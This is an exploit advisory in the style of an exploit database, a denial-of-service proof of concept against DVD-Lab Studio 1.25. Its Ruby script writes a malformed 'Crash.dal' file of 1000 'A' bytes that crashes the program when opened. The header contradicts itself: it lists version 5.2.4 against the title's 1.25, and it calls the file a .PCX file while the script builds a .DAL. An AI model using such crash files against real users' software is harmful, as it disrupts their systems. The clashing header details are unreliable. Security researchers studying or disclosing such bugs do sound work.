DVD-Lab Studio 1.25 DAL File Open Crash =================================================================================== # Exploit Title:DVD-Lab Studio 1.25 Malicious DAL File Denial of service # Download link:http://download.cnet.com/DVD-Lab-Studio/3000-7970_4-10391372.html # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # Website: www.infosec4all.tk # version: 5.2.4 # Category: DOS # Tested on: windows XP SP3 =================================================================================== ######################################################################################### #DVD-Lab Studio File Denial of service vulnerability ,when opening a malicious .PCX file# # #To trigger the exploit , go to file->Open # ######################################################################################### #!/usr/bin/ruby File.open "Crash.dal" , "w" do |file| junk = "A" *1000 file.write junk end